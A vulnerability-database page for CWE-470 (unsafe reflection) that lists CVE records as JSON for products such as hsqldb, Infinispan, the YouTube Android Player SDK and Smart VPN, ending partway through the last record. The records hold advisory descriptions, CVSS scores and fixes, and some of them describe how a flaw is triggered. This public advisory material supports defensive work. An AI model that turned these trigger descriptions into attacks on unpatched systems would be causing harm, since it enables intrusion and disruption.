CWE-470
AllowedUse of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
Abstraction: Base · Status: Draft
The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.
112 vulnerabilities reference this CWE, most recent first.
CVE-2023-0460 (GCVE-0-2023-0460)
Vulnerability from cvelistv5 – Published: 2023-03-01 16:50 – Updated: 2025-03-07 21:33- CWE-470 - Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
| Vendor | Product | Version | |
|---|---|---|---|
| YouTube Android Player API SDK |
Affected:
1.2 , ≤ 1.2.2
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T05:10:56.319Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://developers.google.com/youtube/android/player/downloads"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-0460",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-07T21:32:45.249893Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T21:33:17.205Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "YouTube Android Player API SDK",
"vendor": "Google",
"versions": [
{
"lessThanOrEqual": "1.2.2",
"status": "affected",
"version": "1.2",
"versionType": "custom"
}
]
}
],
"datePublic": "2023-03-01T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "The YouTube Embedded 1.2 SDK binds to a service within the YouTube Main App. After binding, a remote context is created with the flags Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY. This allows the client app to remotely load code from YouTube Main App by retrieving the Main App\u2019s ClassLoader. A\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;potential vulnerability in the binding logic used by the client SDK where the SDK ends up calling \u003c/span\u003e\u003ccode\u003ebindService()\u003c/code\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;on a malicious app rather than YT Main App. This creates a vulnerability where the SDK can load the malicious app\u2019s ClassLoader instead, allowing the malicious app to load arbitrary code into the calling app whenever the embedded SDK is invoked.\u003cbr\u003e\u003cbr\u003e\u003c/span\u003eIn order to trigger this vulnerability, an attacker must masquerade the Youtube app and install it on a device, have a second app that uses the Embedded player and typically distribute both to the victim outside of the Play Store."
}
],
"value": "The YouTube Embedded 1.2 SDK binds to a service within the YouTube Main App. After binding, a remote context is created with the flags Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY. This allows the client app to remotely load code from YouTube Main App by retrieving the Main App\u2019s ClassLoader. A\u00a0potential vulnerability in the binding logic used by the client SDK where the SDK ends up calling bindService()\u00a0on a malicious app rather than YT Main App. This creates a vulnerability where the SDK can load the malicious app\u2019s ClassLoader instead, allowing the malicious app to load arbitrary code into the calling app whenever the embedded SDK is invoked.\n\nIn order to trigger this vulnerability, an attacker must masquerade the Youtube app and install it on a device, have a second app that uses the Embedded player and typically distribute both to the victim outside of the Play Store."
}
],
"impacts": [
{
"capecId": "CAPEC-253",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-253 Remote Code Inclusion"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "CWE-470 Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-03-01T16:50:12.807Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://developers.google.com/youtube/android/player/downloads"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Remote code execution in YouTube Android Player API SDK",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-0460",
"datePublished": "2023-03-01T16:50:12.807Z",
"dateReserved": "2023-01-24T09:44:52.484Z",
"dateUpdated": "2025-03-07T21:33:17.205Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-41853 (GCVE-0-2022-41853)
Vulnerability from cvelistv5 – Published: 2022-10-06 17:14 – Updated: 2025-04-21 13:48- CWE-470 - Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
| Vendor | Product | Version | |
|---|---|---|---|
| HyperSQL DataBase | hsqldb |
Affected:
unspecified , < 2.7.1
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T12:56:38.229Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7"
},
{
"tags": [
"x_transferred"
],
"url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control"
},
{
"name": "[debian-lts-announce] 20221210 [SECURITY] [DLA 3234-1] hsqldb security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00020.html"
},
{
"name": "DSA-5313",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5313"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-41853",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-21T13:37:02.383414Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-21T13:48:46.363Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "hsqldb",
"vendor": "HyperSQL DataBase",
"versions": [
{
"lessThan": "2.7.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"datePublic": "2021-07-26T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property \"hsqldb.method_class_names\" to classes which are allowed to be called. For example, System.setProperty(\"hsqldb.method_class_names\", \"abc\") or Java argument -Dhsqldb.method_class_names=\"abc\" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "CWE-470 Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-01-11T00:00:00.000Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7"
},
{
"url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control"
},
{
"name": "[debian-lts-announce] 20221210 [SECURITY] [DLA 3234-1] hsqldb security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00020.html"
},
{
"name": "DSA-5313",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5313"
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Remote code execution in HyperSQL DataBase",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2022-41853",
"datePublished": "2022-10-06T17:14:43.225Z",
"dateReserved": "2022-09-30T00:00:00.000Z",
"dateUpdated": "2025-04-21T13:48:46.363Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-23744 (GCVE-0-2022-23744)
Vulnerability from cvelistv5 – Published: 2022-07-07 15:51 – Updated: 2024-08-03 03:51- CWE-470 - Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
| URL | Tags |
|---|---|
| https://supportcenter.checkpoint.com/supportcente… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | Enterprise Endpoint Security Windows Clients. |
Affected:
before E86.50
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:51:45.906Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk179609"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Enterprise Endpoint Security Windows Clients.",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "before E86.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Check Point Endpoint before version E86.50 failed to protect against specific registry change which allowed to disable endpoint protection by a local administrator."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "CWE-470: Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-08T17:07:36.000Z",
"orgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"shortName": "checkpoint"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk179609"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@checkpoint.com",
"ID": "CVE-2022-23744",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Enterprise Endpoint Security Windows Clients.",
"version": {
"version_data": [
{
"version_value": "before E86.50"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Check Point Endpoint before version E86.50 failed to protect against specific registry change which allowed to disable endpoint protection by a local administrator."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-470: Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk179609",
"refsource": "MISC",
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk179609"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"assignerShortName": "checkpoint",
"cveId": "CVE-2022-23744",
"datePublished": "2022-07-07T15:51:44.000Z",
"dateReserved": "2022-01-19T00:00:00.000Z",
"dateUpdated": "2024-08-03T03:51:45.906Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-7857 (GCVE-0-2020-7857)
Vulnerability from cvelistv5 – Published: 2021-04-20 19:56 – Updated: 2024-08-04 09:41- CWE-470 - Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
| URL | Tags |
|---|---|
| https://www.boho.or.kr/krcert/secNoticeView.do?bu… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T09:41:01.893Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36006"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "XPlatform",
"vendor": "Tobesoft",
"versions": [
{
"lessThan": "9.2.2.280",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Jeongun Baek"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability of XPlatform could allow an unauthenticated attacker to execute arbitrary command. This vulnerability exists due to insufficient validation of improper classes. This issue affects: Tobesoft XPlatform versions prior to 9.2.2.280."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "CWE-470 Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-04-20T19:58:10.000Z",
"orgId": "cdd7a122-0fae-4202-8d86-14efbacc2863",
"shortName": "krcert"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36006"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "vuln@krcert.or.kr",
"ID": "CVE-2020-7857",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "XPlatform",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "9.2.2.280"
}
]
}
}
]
},
"vendor_name": "Tobesoft"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Jeongun Baek"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability of XPlatform could allow an unauthenticated attacker to execute arbitrary command. This vulnerability exists due to insufficient validation of improper classes. This issue affects: Tobesoft XPlatform versions prior to 9.2.2.280."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-470 Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36006",
"refsource": "MISC",
"url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36006"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "cdd7a122-0fae-4202-8d86-14efbacc2863",
"assignerShortName": "krcert",
"cveId": "CVE-2020-7857",
"datePublished": "2021-04-20T19:56:46.000Z",
"dateReserved": "2020-01-22T00:00:00.000Z",
"dateUpdated": "2024-08-04T09:41:01.893Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-10174 (GCVE-0-2019-10174)
Vulnerability from cvelistv5 – Published: 2019-11-25 10:26 – Updated: 2024-08-04 22:10| URL | Tags |
|---|---|
| https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2… | x_refsource_CONFIRM |
| https://access.redhat.com/errata/RHSA-2020:0481 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2020:0727 | vendor-advisoryx_refsource_REDHAT |
| https://security.netapp.com/advisory/ntap-2022021… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| [UNKNOWN] | infinispan |
Affected:
10.0.0.Final
Affected: 9.4.17.Final |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T22:10:10.097Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10174"
},
{
"name": "RHSA-2020:0481",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0481"
},
{
"name": "RHSA-2020:0727",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0727"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20220210-0018/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "infinispan",
"vendor": "[UNKNOWN]",
"versions": [
{
"status": "affected",
"version": "10.0.0.Final"
},
{
"status": "affected",
"version": "9.4.17.Final"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Infinispan such that the invokeAccessibly method from the public class ReflectionUtil allows any application class to invoke private methods in any class with Infinispan\u0027s privileges. The attacker can use reflection to introduce new, malicious behavior into the application."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "CWE-470",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-02-10T09:06:27.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10174"
},
{
"name": "RHSA-2020:0481",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0481"
},
{
"name": "RHSA-2020:0727",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0727"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://security.netapp.com/advisory/ntap-20220210-0018/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert@redhat.com",
"ID": "CVE-2019-10174",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "infinispan",
"version": {
"version_data": [
{
"version_value": "10.0.0.Final"
},
{
"version_value": "9.4.17.Final"
}
]
}
}
]
},
"vendor_name": "[UNKNOWN]"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability was found in Infinispan such that the invokeAccessibly method from the public class ReflectionUtil allows any application class to invoke private methods in any class with Infinispan\u0027s privileges. The attacker can use reflection to introduce new, malicious behavior into the application."
}
]
},
"impact": {
"cvss": [
[
{
"vectorString": "7.5/CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
]
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-470"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10174",
"refsource": "CONFIRM",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10174"
},
{
"name": "RHSA-2020:0481",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2020:0481"
},
{
"name": "RHSA-2020:0727",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2020:0727"
},
{
"name": "https://security.netapp.com/advisory/ntap-20220210-0018/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20220210-0018/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2019-10174",
"datePublished": "2019-11-25T10:26:16.000Z",
"dateReserved": "2019-03-27T00:00:00.000Z",
"dateUpdated": "2024-08-04T22:10:10.097Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-3834 (GCVE-0-2019-3834)
Vulnerability from cvelistv5 – Published: 2019-10-03 13:31 – Updated: 2024-08-04 19:19| URL | Tags |
|---|---|
| https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T19:19:18.590Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3834"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "struts",
"vendor": "RedHat",
"versions": [
{
"status": "affected",
"version": "all versions under 1.3.10_1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "It was found that the fix for CVE-2014-0114 had been reverted in JBoss Operations Network 3 (JON). This flaw allows attackers to manipulate ClassLoader properties on a vulnerable server. Exploits that have been published rely on ClassLoader properties that are exposed such as those in JON 3. Additional information can be found in the Red Hat Knowledgebase article: https://access.redhat.com/site/solutions/869353. Note that while multiple products released patches for the original CVE-2014-0114 flaw, the reversion described by this CVE-2019-3834 flaw only occurred in JON 3."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-470",
"description": "CWE-470",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-03T13:31:06.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3834"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert@redhat.com",
"ID": "CVE-2019-3834",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "struts",
"version": {
"version_data": [
{
"version_value": "all versions under 1.3.10_1"
}
]
}
}
]
},
"vendor_name": "RedHat"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "It was found that the fix for CVE-2014-0114 had been reverted in JBoss Operations Network 3 (JON). This flaw allows attackers to manipulate ClassLoader properties on a vulnerable server. Exploits that have been published rely on ClassLoader properties that are exposed such as those in JON 3. Additional information can be found in the Red Hat Knowledgebase article: https://access.redhat.com/site/solutions/869353. Note that while multiple products released patches for the original CVE-2014-0114 flaw, the reversion described by this CVE-2019-3834 flaw only occurred in JON 3."
}
]
},
"impact": {
"cvss": [
[
{
"vectorString": "5.6/CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
]
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-470"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3834",
"refsource": "CONFIRM",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3834"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2019-3834",
"datePublished": "2019-10-03T13:31:06.000Z",
"dateReserved": "2019-01-03T00:00:00.000Z",
"dateUpdated": "2024-08-04T19:19:18.590Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-25239 (GCVE-0-2018-25239)
Vulnerability from cvelistv5 – Published: 2026-04-04 13:51 – Updated: 2026-04-06 16:42- CWE-470 - Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/46272 | exploit |
| https://www.microsoft.com/store/productId/9NH1G93D4HKR | product |
| https://www.vulncheck.com/advisories/smart-vpn-de… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2018-25239",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-06T16:42:06.658945Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-06T16:42:33.379Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Smart VPN",
"vendor": "SmartVPN",
"versions": [
{
"status": "affected",
"version": "1.1.3.0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "0xB9"
}
],
"datePublic": "2018-01-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Smart VPN 1.1.3.0 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input through the search interface. Attackers can paste a buffer of 2100 characters into the top right search bar to trigger an unhandled exception that crashes the application."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
